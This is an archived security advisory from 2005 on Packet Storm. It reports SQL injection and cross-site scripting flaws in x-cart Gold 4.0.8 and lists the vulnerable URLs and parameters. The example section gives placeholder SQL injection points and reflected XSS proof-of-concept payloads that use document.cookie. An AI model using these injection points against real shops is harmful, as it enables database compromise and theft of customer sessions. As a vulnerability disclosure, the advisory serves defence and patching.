exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xcartGold.txt

xcartGold.txt
Posted Aug 14, 2005
Site svt.nukleon.us

x-cart Gold version 4.0.8 suffer from many SQL injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | d4d664d9d9404c7c78c5741a9e5c3c4d47c9621f5eb381053090bd2d24e0ca50

xcartGold.txt

Change Mirror Download


SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Multiple vulnerabilities in x-cart Gold
The program: x-cart Gold
The vulnerable version: 4.0.8
Homepage: www.x-cart.com
Vulnerability is found: 29.05.05
Has found: CENSORED / SVT / www.svt.nukleon.us
=====================================================================
The description.

SQL - injections
---------------
At research of a product the set Multiple vulnerabilities was revealed
SQL-Injections. Vulnerability mentions practically all parameters.
The first mistake has been found in parameter "cat". In a script
There is no check of this parameter and at substitution of a symbol
"'" Probably, to make SQL-an injection. Further the mistake has been
found in Parameter "productid" as from - for absence of check on
Special symbols, by transfer to this parameter of a symbol "'" occurs
Mistake SQL, and script forwards automatically on page
Speaking about a mistake. On this page the parameter "id" is visible to it
We transfer a symbol "'" and as probably to make SQL - an injection.
Further we look parameter "mode", at substitution Special symbols
There is a mistake and probably to make SQL - an injection. We shall wound
And parameter "section" in it it is possible to make SQL - an injection.

XSS
---------------
Vulnerability of type XSS can make in the same parameters as at mistakes
SQL - injections
=====================================================================
Example
^^^^^^^^^
SQL - injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]

XSS
---------------
http://example/home.php?cat='><script>alert(document.cookie)</script>
http://example/home.php?printable='><script>alert(document.cookie)</script>
http://example/product.php?productid='><script>alert(document.cookie)</script>
http://example/product.php?mode='><script>alert(document.cookie)</script>
http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
http://example/help.php?section='><script>alert(document.cookie)</script>
http://example/orders.php?mode='><script>alert(document.cookie)</script>
http://example/register.php?mode='><script>alert(document.cookie)</script>
http://example/search.php?mode='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script>
=====================================================================


The conclusion.
^^^^^^^^^^^
Researches made only on version 4.0.8. Other versions as
Can be vulnerable. The manufacturer in popularity is put. If is
What that remarks write on censored@mail.ru
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |
___
___ / /
____________\__\___ / /
| _______________// _/_
____|__________ |\ \/ | |
/__________________| \____/ |
___| |___
|___ ___|
| |___
|_______|
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close